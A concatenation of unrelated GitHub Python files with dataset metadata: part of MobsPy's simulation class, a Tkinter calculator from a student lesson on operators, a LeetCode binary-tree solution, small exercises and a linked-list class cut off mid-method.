mcu.create_orthogonal_vector_structure(model)\n\n # Get all meta - reactions\n self._reactions_set = set()\n for spe_object in self.model:\n for reference in spe_object.get_references():\n self._reactions_set = self._reactions_set.union(reference.get_reactions())\n\n self._species_counts = []\n for spe_object in self.model:\n for count in spe_object.get_quantities():\n self._species_counts.append({'object': spe_object, 'characteristics': count['characteristics'],\n 'quantity': count['quantity']})\n\n if not parameters:\n self.parameters = get_default_parameters()\n\n if not plot_parameters:\n self.plot_parameters = get_default_plot_parameters()\n\n # Other needed things for simulating\n self.results = {}\n self.fres = {}\n self.default_order = Default\n\n self._species_for_sbml = None\n self._reactions_for_sbml = None\n self._parameters_for_sbml = None\n self._mappings_for_sbml = None\n self._events_for_sbml = None\n self.model_string = ''\n\n def compile(self, verbose=True):\n \"\"\"\n Compiler method that calls the Compiler class in the modules directory\n\n :param verbose: (bool) = print or not the results of the compilation\n \"\"\"\n simlog.global_simlog_level = self.parameters['level']\n simlog.debug('Compiling model')\n\n pr.parameter_process(self.parameters)\n if self.parameters['method'] is not None:\n self.parameters['simulation_method'] = self.parameters['method']\n\n if self.parameters['simulation_method'].lower() == 'deterministic':\n self.plot_parameters['simulation_method'] = 'deterministic'\n elif self.parameters['simulation_method'].lower() == 'stochastic':\n self.plot_parameters['simulation_method'] = 'stochastic'\n\n # Pass end condition to dict parameters - It is stored outside of parameters to the parameters serializable\n # However, it is necessary for the compilation so it is passed as a parameter\n self.parameters['_end_condition'] = self._end_condition\n\n self._species_for_sbml, self._reactions_for_sbml, \\\n self._parameters_for_sbml, self._mappings_for_sbml, \\\n self.model_string, self._events_for_sbml, self._assigned_species_list, \\\n self.model_parameters = \\\n Compiler.compile(self.model,\n reactions_set=self._reactions_set,\n species_counts=self._species_counts,\n orthogonal_vector_structure=self.orthogonal_vector_structure,\n volume=self.parameters['volume'],\n 
type_of_model=self.parameters[\n \"simulation_method\"],\n verbose=verbose,\n event_dictionary=self.total_packed_events,\n continuous_sim=self.parameters['_continuous_simulation'],\n ending_condition=self.parameters['_end_condition'],\n skip_expression_check=self.parameters['skip_expression_check'])\n\n # The volume is converted to the proper unit at the compiler level\n self.parameters['volume'] = self._parameters_for_sbml['volume'][0]\n self.mappings = deepcopy(self._mappings_for_sbml)\n\n # Set common parameters for plot and simulation\n self.plot_parameters['unit_x'] = self.parameters['unit_x']\n self.plot_parameters['unit_y'] = self.parameters['unit_y']\n self.plot_parameters['output_concentration'] = self.parameters['output_concentration']\n\n self.all_species_not_mapped = {}\n for key in self._species_for_sbml:\n self.all_species_not_mapped[key.replace('_dot_', '.')] = self._species_for_sbml[key]\n\n self._list_of_models += [{'species_for_sbml': self._species_for_sbml,\n 'parameters_for_sbml': self._parameters_for_sbml,\n 'reactions_for_sbml': self._reactions_for_sbml,\n 'events_for_sbml': self._events_for_sbml,\n 'species_not_mapped': self.all_species_not_mapped,\n 'mappings': self.mappings,\n 'assigned_species': self._assigned_species_list}]\n\n self._list_of_parameters = [self.parameters]\n\n if self.model_string != '':\n return self.model_string\n\n def _assemble_multi_simulation_structure(self):\n\n if not self.sbml_data_list:\n data_for_sbml_construction, parameter_list_of_dic = ps.generate_all_sbml_models(self.model_parameters,\n self._list_of_models)\n self.sbml_data_list = data_for_sbml_construction\n self._parameter_list_of_dic = parameter_list_of_dic\n\n def run(self):\n \"\"\"\n Runs the simulation by colling the models in the sbml_simulator directory.\n Compiles the model if it was not yet compiled\n \"\"\"\n # Base case - If there are no events we compile the model here\n if self._species_for_sbml is None:\n self.compile(verbose=False)\n\n self._assemble_multi_simulation_structure()\n\n simlog.debug('Starting Simulator')\n jobs = self.set_job_number(self.parameters)\n simulation_function = lambda x: sbml_run.simulate(jobs, self._list_of_parameters, x)\n results = Parallel(n_jobs=jobs, prefer=\"threads\")(delayed(simulation_function)(sbml)\n for sbml in self.sbml_data_list)\n\n simlog.debug(\"Simulation is Over\")\n\n def convert_one_ts_to_desired_unit(unconverted_data):\n # Convert all the data from a single ts to desired unit\n return dh.convert_data_to_desired_unit(unconverted_data, self.parameters['unit_x'],\n self.parameters['unit_y'],\n self.parameters['output_concentration'],\n self.parameters['volume'])\n\n def convert_all_ts_to_correct_format(single_ts, parameters, unit_convert=False):\n # Convert multiple ts_data into correct format\n if unit_convert:\n data_dict = {'data': convert_one_ts_to_desired_unit(single_ts),\n 'params': self.parameters,\n 'models': self._list_of_models}\n else:\n data_dict = {'data': single_ts,\n 'params': self.parameters,\n 'models': self._list_of_models}\n return MobsPyTimeSeries(data_dict, parameters)\n\n flatt_ts = []\n if self._parameter_list_of_dic:\n for r, params in zip(results, self._parameter_list_of_dic):\n for ts in r:\n flatt_ts.append((ts, params))\n else:\n for r in results:\n for ts in r:\n flatt_ts.append((ts, {}))\n\n ta = self.parameters['unit_x'] is not None\n tb = self.parameters['unit_y'] is not None\n tc = self.parameters['output_concentration']\n\n if ta or tb or tc:\n all_processed_data = Parallel(n_jobs=jobs, 
prefer=\"threads\") \\\n (delayed(convert_all_ts_to_correct_format)(ts, params, True) for ts, params in flatt_ts)\n else:\n all_processed_data = Parallel(n_jobs=jobs, prefer=\"threads\") \\\n (delayed(convert_all_ts_to_correct_format)(ts, params, False) for ts, params in flatt_ts)\n\n self.results = MobsPyList_of_TS(all_processed_data)\n self.fres = MobsPyList_of_TS([all_processed_data[0]], True)\n\n if self.parameters['save_data']:\n self.save_data()\n\n if self.parameters['plot_data']:\n methods_list = [x['simulation_method'] for x in self._list_of_parameters]\n\n if len(self._parameter_list_of_dic) > 1:\n self.plot_parametric()\n return 0\n\n if ('stochastic' in methods_list or 'directmethod' in methods_list) \\\n and self.parameters['repetitions'] > 1:\n self.plot_stochastic()\n else:\n self.plot_deterministic()\n\n def save_data(self, file=None):\n \"\"\"\n Saves the simulation result data to a file in json format\n\n :param file: (str) name of the file to save the data to. If none a default name is provided\n \"\"\"\n self._save_data(file=file)\n\n def _save_data(self, file=None):\n \"\"\"\n Save results manually into file. Useful for jupyter notebook users\n\n Parameters\n file (str) = name of the file to create and save JSON data\n \"\"\"\n if file is None:\n try:\n with open(self.parameters[\"absolute_output_file\"], 'w') as f:\n json.dump(self.results.to_dict(), f, indent=4)\n except Exception as e:\n simlog.warning(\"Error saving data. Potential solve: file name parameter\")\n simlog.warning(str(e))\n else:\n file += '.json'\n with open(file, 'w') as jf:\n json.dump(self.results.to_dict(), jf, indent=4)\n\n def _pack_data(self, time_series_data):\n \"\"\"\n Packs data from multiple simulations or external data into one simulation object\n\n :param time_series_data: (data in MobsPy format) data to be packed in the simulation object\n \"\"\"\n self.packed_data.append(time_series_data)\n\n # Dealing with parameters\n def set_from_json(self, file_name):\n \"\"\"\n Set simulation parameters from json file\n\n :param file_name: (str) name of the json file\n \"\"\"\n with open(file_name) as json_file:\n data = json.load(json_file)\n for key in data:\n self.__setattr__(key, data[key])\n\n def __setattr__(self, name, value):\n \"\"\"\n __setattr__ override. 
For setting simulation parameters using the _dot_ operator\n\n :param name: (str) name of the parameter to set\n :param value: value of the parameter\n \"\"\"\n white_list = ['default_order', 'volume', 'model', 'names', 'parameters', 'model_string',\n 'plot_parameters', 'results', '_species_for_sbml',\n '_reactions_for_sbml', '_parameters_for_sbml', '_mappings_for_sbml', 'mappings',\n 'all_species_not_mapped', 'self._species_for_sbml', 'self._reactions_for_sbml',\n 'self._parameters_for_sbml', 'self._mappings_for_sbml', 'self.model_string',\n 'event_times', 'event_models', 'event_count_dics', '_events_for_sbml',\n 'total_packed_events', 'species_initial_counts', '_species_to_set',\n '_event_time', 'previous_trigger', 'current_event_count_data',\n 'current_condition', 'current_event_trigger_data',\n 'number_of_context_comparisons', 'pre_number_of_context_comparisons', '_continuous_simulation',\n 'initial_duration', '_reactions_set', '_list_of_models', '_list_of_parameters',\n '_context_not_active', '_species_counts', '_assigned_species_list', '_conditional_event',\n '_end_condition', 'orthogonal_vector_structure', 'model_parameters', 'fres',\n 'sbml_data_list', '_parameter_list_of_dic']\n\n plotted_flag = False\n if name in white_list:\n self.__dict__[name] = value\n\n if 'plot_flag' in self.__dict__ and self.__dict__['plot_flag']:\n self.__dict__[\"plot_parameters\"][name] = value\n self.__dict__[\"plot_flag\"] = False\n plotted_flag = True\n\n if not plotted_flag:\n example_parameters = get_example_parameters()\n if name in example_parameters.keys():\n if name == 'duration':\n if type(value) == bool:\n simlog.error(f'MobsPy has received an invalid trigger type: {type(value)} \\n' +\n f'Please make sure you are not using the operator == for ' +\n f'creating event conditions \\n'\n , stack_index=2)\n\n if name == 'duration' and isinstance(value, MetaSpeciesLogicResolver):\n self.__dict__['parameters']['_continuous_simulation'] = True\n self.__dict__['_end_condition'] = value\n if 'initial_conditional_duration' not in self.__dict__['parameters']:\n self.__dict__['parameters']['initial_conditional_duration'] = 1\n else:\n self.__dict__['parameters'][name] = value\n elif name in white_list:\n pass\n else:\n simlog.error(f'Parameter {name} is not supported', stack_index=2)\n\n def __getattribute__(self, item):\n ta = item == 'results' and self.__dict__['results'] == {}\n tb = item == 'fres' and self.__dict__['fres'] == {}\n if ta or tb:\n simlog.error('The results were accessed before the execution of the simulation', stack_index=2)\n\n if item == 'plot_config':\n return self.__getattr__(item)\n\n return super().__getattribute__(item)\n\n def __getattr__(self, item):\n \"\"\"\n __getattr__ override. 
For the user to be able to set plot parameters as MySim.plot.parameter\n \"\"\"\n if item == 'plot_config':\n self.__dict__['plot_flag'] = True\n else:\n self.__dict__['plot_flag'] = False\n return self\n\n def configure_parameters(self, config):\n \"\"\"\n Configure simulation parameters from json file or dictionary\n\n :param file_name: (str) name of the json file\n \"\"\"\n self.parameters = self.__config_parameters(config)\n\n def configure_plot_parameters(self, config):\n \"\"\"\n Configure plot parameters from json file or dictionary\n\n :param file_name: (str) name of the json file\n \"\"\"\n self.plot_parameters = self.__config_parameters(config)\n\n @staticmethod\n def __config_parameters(config):\n \"\"\"\n Encapsulation for config_plot and config_parameters\n \"\"\"\n if type(config) == str:\n if os.path.splitext(config)[1] != '.json':\n simlog.error('Wrong file extension', stack_index=3)\n parameters_to_config = pr.read_json(config)\n elif type(config) == dict:\n parameters_to_config = config\n else:\n simlog.error(\"Parameters must be python dictionary or json file\", stack_index=3)\n return parameters_to_config\n\n # Plotting encapsulation\n def extract_plot_essentials(self, *species):\n \"\"\"\n Extract essential information for plotting\n\n :param species: (meta-species objects) meta-species objects to plot\n :return: species_strings (str) = species strings to be plotted, self.results = data resulting from the\n simulation, self.plot_parameters (dict) = parameters for plotting\n \"\"\"\n if not species:\n species_strings = set()\n for model in self._list_of_models:\n species_strings = species_strings.union(model['mappings'])\n else:\n species_strings = set()\n\n for spe in species:\n if isinstance(spe, Species):\n species_strings.add(str(spe))\n elif isinstance(spe, Reacting_Species):\n species_strings.add(str(spe))\n elif type(spe) == str:\n species_strings.add(spe)\n else:\n simlog.error('Only species objects or strings for plotting arguments', stack_index=4)\n\n return species_strings, self.results, self.plot_parameters\n\n def plot_stochastic(self, *species):\n \"\"\"\n Calls stochastic plot. See default_plots module in the plot_scripts directory\n\n :param species: (str or meta-species objects) list of species to be plotted\n \"\"\"\n plot_essentials = self.extract_plot_essentials(*species)\n dp.stochastic_plot(plot_essentials[0], plot_essentials[1], plot_essentials[2])\n\n def plot_deterministic(self, *species):\n \"\"\"\n Calls deterministic plot. See default_plots module in the plot_scripts directory\n\n :param species: (str or meta-species objects) list of species to be plotted\n \"\"\"\n plot_essentials = self.extract_plot_essentials(*species)\n dp.deterministic_plot(plot_essentials[0], plot_essentials[1], plot_essentials[2])\n\n def plot_parametric(self, *species):\n plot_essentials = self.extract_plot_essentials(*species)\n dp.parametric_plot(plot_essentials[0], plot_essentials[1], plot_essentials[2])\n\n def plot(self, *species):\n \"\"\"\n Another way of calling plot_deterministic for simplicity\n\n :param species: (str or meta-species objects) list of species to be plotted\n \"\"\"\n self.plot_deterministic(*species)\n\n def plot_raw(self, parameters_or_file):\n \"\"\"\n Calls raw plot. 
See default_plots module in the plot_scripts directory\n\n :param parameters_or_file: json file name with plot parameter configuration or dictionary with plot\n parameter configuration\n \"\"\"\n dp.raw_plot(self.results, parameters_or_file)\n\n def __add__(self, other):\n return SimulationComposition(self, other)\n\n def generate_sbml(self):\n \"\"\"\n Generates sbmls strings from the current stored models in the simulation\n\n \"return: to_return (list of str) list of sbml files from all the simulations stored\n \"\"\"\n to_return = []\n if self._species_for_sbml is None:\n self.compile(verbose=False)\n self._assemble_multi_simulation_structure()\n\n for parameter_sweep in self.sbml_data_list:\n for sbml_data in parameter_sweep:\n to_return.append(sbml_builder.build(sbml_data['species_for_sbml'], sbml_data['parameters_for_sbml'],\n sbml_data['reactions_for_sbml'], sbml_data['events_for_sbml']))\n return to_return\n\n @classmethod\n def is_simulation(cls):\n return True\n\n @classmethod\n def set_job_number(cls, params):\n # Run in parallel or sequentially\n # If nothing is specified just run it in parallel\n try:\n if params[\"jobs\"] == 1:\n simlog.debug(\"Running simulation sequentially\")\n jobs = params[\"jobs\"]\n else:\n simlog.debug(\"Running simulation in parallel\")\n jobs = params[\"jobs\"]\n except KeyError:\n simlog.debug(\"Running simulation in parallel\")\n jobs = -1\n return jobs\n\n\nclass SimulationComposition:\n\n def _compile_multi_simulation(self):\n for sim1 in self.list_of_simulations:\n for sim2 in self.list_of_simulations:\n if sim1 == sim2:\n continue\n\n for spe1 in sim1.model:\n for spe2 in sim2.model:\n\n if spe1.get_name() == spe2.get_name():\n if spe1.get_all_characteristics() != spe2.get_all_characteristics():\n simlog.error(f'Species {spe1.get_name()} was modified through simulations. \\n' +\n f'Although reactions can be removed, the characteristics inherited must'\n f'remains the same')\n\n def __init__(self, S1, S2):\n if isinstance(S1, Simulation) and isinstance(S2, Simulation):\n self.list_of_simulations = [S1] + [S2]\n elif isinstance(S1, SimulationComposition) and isinstance(S2, Simulation):\n self.list_of_simulations = S1.list_of_simulations + [S2]\n elif isinstance(S1, Simulation) and isinstance(S2, SimulationComposition):\n self.list_of_simulations = [S1] + S2.list_of_simulations\n elif isinstance(S1, SimulationComposition) and isinstance(S2, SimulationComposition):\n self.list_of_simulations = S1.list_of_simulations + S2.list_of_simulations\n else:\n simlog.error('Simulation compositions can only be performed with other simulations', stack_index=3)\n self.results = None\n self.fres = None\n self.base_sim = self.list_of_simulations[0]\n\n def __add__(self, other):\n return SimulationComposition(self, other)\n\n # FIX THIS\n def __setattr__(self, name, value):\n white_list = ['list_of_simulations', 'results', 'base_sim', 'fres']\n broad_cast_parameters = ['level', 'method', 'volume']\n\n if name == 'duration':\n simlog.error('The durations are to be defined specifically to each simulation and not for the concatenated'\n ' object. 
\\n'\n 'Please set the durations for each simulation object independently', stack_index=2)\n\n if name in broad_cast_parameters:\n if name == 'volume':\n for sim in self.list_of_simulations:\n if sim.__dict__['parameters'][name] != 1:\n simlog.error('Volumes must be defined only individually for each simulation or once in the '\n 'concatenated simulation', stack_index=2)\n else:\n for sim in self.list_of_simulations:\n sim.__dict__['parameters'][name] = value\n\n if name in white_list:\n self.__dict__[name] = value\n else:\n self.base_sim.__setattr__(name, value)\n\n def __getattr__(self, item):\n if item == 'plot_config':\n self.base_sim.__dict__['plot_flag'] = True\n return self.base_sim\n\n def compile(self, verbose=True):\n str = ''\n for sim in self.list_of_simulations:\n str += sim.compile(verbose)\n\n self._compile_multi_simulation()\n self.base_sim._assemble_multi_simulation_structure()\n if str != '':\n return str\n\n def _check_all_sims_compilation(self):\n\n for sim in self.list_of_simulations:\n if sim._species_for_sbml is None:\n sim.compile(verbose=False)\n\n def run(self):\n\n self._check_all_sims_compilation()\n self._compile_multi_simulation()\n\n multi_parameter_dictionary = {}\n\n for sim in self.list_of_simulations:\n multi_parameter_dictionary = ps.unite_parameter_dictionaries(multi_parameter_dictionary,\n sim.model_parameters)\n\n self.base_sim.model_parameters = multi_parameter_dictionary\n\n for sim in self.list_of_simulations:\n\n if sim == self.base_sim:\n continue\n\n self.base_sim._list_of_models += sim._list_of_models\n self.base_sim._list_of_parameters += sim._list_of_parameters\n\n self.base_sim.run()\n self.results = self.base_sim.results\n self.fres = self.base_sim.fres\n\n def plot_deterministic(self, *species):\n self.base_sim.plot_deterministic(*species)\n\n def plot_stochastic(self, *species):\n self.base_sim.plot_stochastic(*species)\n\n def plot(self, *species):\n self.base_sim.plot(*species)\n\n def plot_raw(self, parameters_or_file):\n self.base_sim.plot_raw(parameters_or_file)\n\n def generate_sbml(self):\n\n self._check_all_sims_compilation()\n self._compile_multi_simulation()\n\n for sim in self.list_of_simulations:\n\n if sim == self.base_sim:\n continue\n\n self.base_sim._list_of_models += sim._list_of_models\n self.base_sim._list_of_parameters += sim._list_of_parameters\n\n return self.base_sim.generate_sbml()\n\n @classmethod\n def is_simulation(cls):\n return True\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"ROBACON/mobspy","sub_path":"mobspy/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":30077,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} +{"seq_id":"71929649925","text":"#Cette fonction retourne le # de séquence Maximale de charactère qui se suit\ndef séquenceMax(liste):\n a=[]\n for i in range(len(liste)):\n a.append(liste.count(liste[i]))\n a=max(a)\n return a\n\n#Prend l'entrer de l'usage\ninp= input(\"Veuillez entrer une liste de valeurs séparées par des virgules: \").split(\",\")\ninp= [int(b) for b in inp]\nprint(séquenceMax(inp))\n","repo_name":"Jean-Markello/Python-Coding","sub_path":"devoir 4/d4q1.py","file_name":"d4q1.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"9633236936","text":"\nfrom Tkinter import *\nimport tkColorChooser\nimport tkSimpleDialog\n\nimport Globals\n\nfrom SplineSet import GetTkColor\n\nclass 
SplineDlgLabels(tkSimpleDialog.Dialog):\n\n def body(self,master):\n \"\"\" define the controls of the widget \"\"\"\n\n frm = Frame(master)\n frm.pack(padx = 3, pady=3)\n\n self.text = StringVar()\n self.text.set(\"default\")\n\n self.btn = Button(frm,\n text=\"Choose Color\",\n command=self.SelectColor)\n self.color = None\n\n def SelectColor(self):\n colorTuple = tkColorChooser.askcolor(color=self.color)\n self.color = colorTuple[0]\n if self.color:\n self.btn.config(bg=GetTkColor(self.color))\n\n def ok(self,event=None):\n\n Globals.objectSet.SetLabel(self.text.get(),\n self.color)\n tkSimpleDialog.Dialog.cancel(self,event)\n\n \n \n","repo_name":"neurodebian/freesurfer","sub_path":"pyScout/SplineDlgLabels.py","file_name":"SplineDlgLabels.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"99"} +{"seq_id":"71860374406","text":"import shutil\nreadPath='Missing_2019-06-26.txt'\nwritePath='fix2.txt'\nlines_seen=set()\noutfiile=open(writePath,'a+')\nf=open(readPath,'r')\nfor line in f:\n if line not in lines_seen:\n outfiile.write(line)\n lines_seen.add(line)\n# --------------------- \n# 作者:TtingZh \n# 来源:CSDN \n# 原文:https://blog.csdn.net/t_zht/article/details/83377165 \n# 版权声明:本文为博主原创文章,转载请附上博文链接!","repo_name":"findpkq/Xanadu_Steam_CN","sub_path":"Tool/去重.py","file_name":"去重.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"8545613443","text":"def Morning() :\r\n \"\"\"\r\n OPERATORS\r\n \r\n Arithmatic operators\r\n -Division /\r\n -Whole number Division //\r\n -Subtraction -\r\n -Modulus %\r\n -Exponemtial **\r\n -Multiplicatino *\r\n \r\n Comparison operators\r\n -Equal to ==\r\n -Not equal to != or !==\r\n -Geater than >\r\n -less than <\r\n -Greater than or equal to >=\r\n -Less than or equal to <=\r\n \r\n Logical operators\r\n -and\r\n -or\r\n -not\r\n \r\n Assignment operators\r\n -Assignment =\r\n -Add and assign +=\r\n -Subtract and assign -=\r\n \r\n Membership operators\r\n -in => checks if value exists in a sequence\r\n -not in => checks if value does not exist in a sequence\r\n \r\n Identity operators\r\n -is => checks similarity\r\n -is not => checks for difference in values\r\n \r\n \"\"\"\r\n #Arithmatic examples\r\n a = 5\r\n b= 10\r\n c=3\r\n print(a+b)\r\n print(a-b)\r\n print(b/c)\r\n print(b//c)\r\n print(b%c)\r\n print(a*c)\r\n print(c**c)\r\n \r\n #Comparison examples\r\n print(a>b) #false\r\n print(a=c) #true\r\n print(a<=c) #false\r\n print(a==b) #false\r\n print(a!=b) #true\r\n \r\n #Logical operators\r\n k = True\r\n l = False\r\n \r\n print(k and k) #true\r\n print(k and l) #false\r\n print(not k) #false\r\n print(k or l) #true\r\n \r\n #Assignment operators\r\n \r\n #subtract and assign\r\n m = 34\r\n m -= 4\r\n print(m) # 30\r\n \r\n #add and assign\r\n o = 34\r\n o += 6\r\n print(o) # 40\r\n \r\n #integer divide and assign\r\n p = 32\r\n p //= 2\r\n print(p) # 16\r\n \r\n #integer divide and assign\r\n p /= 2\r\n print(p) # 8.0\r\n \r\n #modulus and assign\r\n q = 4\r\n q %= 3\r\n print(q) # 1\r\n \r\n #Membership operators\r\n phones =[\"Samsung\",\"Iphone\",\"Blackberry\",\"Nokia\"]\r\n print(\"Nokia\" in phones) #true\r\n print(\"Samsung\" in phones) #true\r\n print(\"OLG\" in phones) #false\r\n print(\"Oppo\" in phones) #false\r\n \r\n #Identity operators\r\n f = \"boy\"\r\n g = \"girl\"\r\n \r\n print( f is g) #false\r\n print( f is not g) #true\r\n \r\n #Bitwise 
Operators => perform operations on individual bits of binary numbers\r\n # and &\r\n # or ||\r\n #xor ^\r\n #nont ~\r\n #leftshift <<\r\n #rightshift >>\r\n \r\n \r\n \r\n #ASSIGNMENT BUILT A SIMPLE FUNCTIONING CALCULATOR WITH A GUI INTERFACE USING TKINTER (+,-,*,/)\r\n #Title > your name \r\n \r\n \r\n import tkinter as tk\r\n #Defining click handlers\r\n def tap_button(number):\r\n current = entry.get()\r\n entry.delete(0, tk.END)\r\n entry.insert(tk.END, current + str(number))\r\n\r\n def clear_button():\r\n entry.delete(0, tk.END)\r\n\r\n def equals_button():\r\n expression = entry.get()\r\n try:\r\n result = eval(expression)\r\n entry.delete(0, tk.END)\r\n entry.insert(tk.END, result)\r\n except Exception:\r\n entry.delete(0, tk.END)\r\n entry.insert(tk.END, \"Arithmetic error\")\r\n \r\n #Supplying title to my program\r\n \r\n window = tk.Tk()\r\n window.title(\"Sendi Joseph\")\r\n\r\n #Creating display window\r\n\r\n entry = tk.Entry(window, width=35, border= 4)\r\n entry.grid(row=0, column=0, columnspan=4)\r\n\r\n #Creating buttons\r\n\r\n button_add = tk.Button(window,border= 3, background=\"coral\", text=\"+\", padx=19, pady=20, command=lambda: tap_button(\"+\"))\r\n button_subtract = tk.Button(window,border= 3, background=\"coral\", text=\"-\", padx=20, pady=20, command=lambda: tap_button(\"-\"))\r\n button_multiply = tk.Button(window,border= 3, background=\"coral\", text=\"*\", padx=20, pady=20, command=lambda: tap_button(\"*\"))\r\n button_divide = tk.Button(window,border= 3, background=\"coral\", text=\"/\", padx=20, pady=20, command=lambda: tap_button(\"/\"))\r\n clear_button = tk.Button(window,border= 3, background=\"red\", text=\"C\", padx=20, pady=20, command=clear_button)\r\n equals_button = tk.Button(window,border= 3, background=\"green\", text=\"=\", padx=20, pady=20, command=equals_button)\r\n\r\n button_1 = tk.Button(window,border= 3, background=\"purple\", text=\"1\", padx=20, pady=20, command=lambda: tap_button(1))\r\n button_2 = tk.Button(window,border= 3, background=\"purple\",text=\"2\", padx=20, pady=20, command=lambda: tap_button(2))\r\n button_3 = tk.Button(window,border= 3, background=\"purple\",text=\"3\", padx=20, pady=20, command=lambda: tap_button(3))\r\n button_4 = tk.Button(window,border= 3, background=\"purple\",text=\"4\", padx=20, pady=20, command=lambda: tap_button(4))\r\n button_5 = tk.Button(window,border= 3, background=\"purple\",text=\"5\", padx=20, pady=20, command=lambda: tap_button(5))\r\n button_6 = tk.Button(window,border= 3, background=\"purple\",text=\"6\", padx=20, pady=20, command=lambda: tap_button(6))\r\n button_7 = tk.Button(window,border= 3, background=\"purple\",text=\"7\", padx=20, pady=20, command=lambda: tap_button(7))\r\n button_8 = tk.Button(window,border= 3, background=\"purple\",text=\"8\", padx=20, pady=20, command=lambda: tap_button(8))\r\n button_9 = tk.Button(window,border= 3, background=\"purple\",text=\"9\", padx=20, pady=20, command=lambda: tap_button(9))\r\n button_0 = tk.Button(window,border= 3, background=\"purple\",text=\"0\", padx=20, pady=20, command=lambda: tap_button(0))\r\n\r\n #Positioning\r\n\r\n button_1.grid(row=1, column=0)\r\n button_2.grid(row=1, column=1)\r\n button_3.grid(row=1, column=2)\r\n button_4.grid(row=2, column=0)\r\n button_5.grid(row=2, column=1)\r\n button_6.grid(row=2, column=2)\r\n button_7.grid(row=3, column=0)\r\n button_8.grid(row=3, column=1)\r\n button_9.grid(row=3, column=2)\r\n button_0.grid(row=4, column=1)\r\n button_add.grid(row=1, column=3)\r\n button_subtract.grid(row=2, 
column=3)\r\n button_multiply.grid(row=3, column=3)\r\n button_divide.grid(row=4, column=3)\r\n clear_button.grid(row=4, column=0)\r\n equals_button.grid(row=4, column=2)\r\n\r\n # Starting window loop\r\n window.mainloop()\r\n\r\nMorning()\r\n\r\ndef Afternoon() :\r\n pass\r\n\r\n","repo_name":"Masembe0757/My_Recess_files-","sub_path":"RECESS/Day 3/Masembe_Sendi_Joseph_morning.PY","file_name":"Masembe_Sendi_Joseph_morning.PY","file_ext":"py","file_size_in_byte":5988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"6940374848","text":"file = open('./17.txt', 'r')\n\nmas = [int(x) for x in file.read().splitlines()]\n\nfile.close()\n\nevenmas = []\n\nfor i in mas:\n if i % 2 == 0:\n evenmas.append(i)\n\nmsum = sum(evenmas) / len(evenmas)\n\nmaxsum = 0\ncounter = 0\n\nfor i in range(0, len(mas)-1):\n a = mas[i]\n b = mas[i+1]\n\n if (a % 3 == 0 or b % 3 == 0) and (a < msum or b < msum):\n counter += 1\n maxsum = max(maxsum, a + b)\n\nprint(counter, maxsum)\n","repo_name":"Aleksey-Danchin/Daito","sub_path":"задачи/17/40733/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32643997318","text":"'''\n623. Add One Row to Tree\n\nGiven the root of a binary tree and two integers val and depth, add a row of nodes with value val at the given depth depth.\n\nNote that the root node is at depth 1.\n\nThe adding rule is:\n\nGiven the integer depth, for each not null tree node cur at the depth depth - 1, create two tree nodes with value val as cur's left subtree root and right subtree root.\ncur's original left subtree should be the left subtree of the new left subtree root.\ncur's original right subtree should be the right subtree of the new right subtree root.\nIf depth == 1 that means there is no depth depth - 1 at all, then create a tree node with value val as the new root of the whole original tree, and the original tree is the new root's left subtree.\n\nExample 1:\n\nInput: root = [4,2,6,3,1,5], val = 1, depth = 2\nOutput: [4,1,1,2,null,null,6,3,1,5]\nExample 2:\n\nInput: root = [4,2,null,3,1], val = 1, depth = 3\nOutput: [4,2,null,1,1,3,null,null,1]\n\nConstraints:\n\nThe number of nodes in the tree is in the range [1, 10^4].\nThe depth of the tree is in the range [1, 10^4].\n-100 <= Node.val <= 100\n-10^5 <= val <= 10^5\n1 <= depth <= the depth of tree + 1\n'''\n\nfrom typing import Optional\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def addOneRow(self, root: Optional[TreeNode], val: int, depth: int) -> Optional[TreeNode]:\n if depth == 1:\n new_root = TreeNode(val=val, left=root)\n return new_root\n \n def add(root, level):\n if not root:\n return\n \n if level == depth-1:\n root.left = TreeNode(val=val, left=root.left)\n root.right = TreeNode(val=val, right=root.right)\n return\n \n add(root.left, level+1)\n add(root.right, level+1)\n \n add(root, 1)\n return root\n ","repo_name":"Chopinsky/algo-problems","sub_path":"challenges/999/623_AddOneRowTree.py","file_name":"623_AddOneRowTree.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"70836486086","text":"class LinkedList:\n def __init__(self, head=None):\n self.head = head\n self.size = 0;\n\n def 
empty(self):\n if not self.head:\n return true\n return false\n\n def size(self):\n return self.size\n\n def print_list(self):\n current = self.head\n if not current:\n print(\"List is empty\")\n else:\n while current:\n print(\"Node: \", current.value)\n current = current.next\n print()\n return\n\n def insert(self, node):\n if not self.head:\n self.head = node\n self.size += 1\n else:\n current = self.head\n while current.next:\n current = current.next\n current.next = node\n self.size += 1\n\n def insert_beginning(self, node):\n if not self.head:\n self.head = none\n self.size += 1\n else:\n node.next = self.head\n self.head = node\n self.size += 1\n\n def insert_after(self, node, afterNode):\n current = self.head\n\n if current.value == afterNode.value:\n node.next = current.next\n current.next = node\n self.size += 1\n return\n else:\n while current and current.next:\n if current.next.value == afterNode.value:\n node.next = current.next.next\n current.next.next = node\n self.size += 1\n return\n else:\n current = current.next\n\n def remove(self, node):\n #If Node that we are trying to remove it's head\n if self.head and self.head.value == node.value:\n self.head = self.head.next\n self.size -= 1\n else:\n current = self.head\n while current and current.next:\n if current.next.value == node.value:\n current.next = current.next.next\n self.size -= 1\n return\n else:\n current = current.next\n\n def pop(self):\n current = self.head\n if current and not current.next:\n self.head = None\n self.size = 0\n return\n else:\n while current and current.next:\n if not current.next.next:\n current.next = None\n self.size -= 1\n return\n else:\n current = 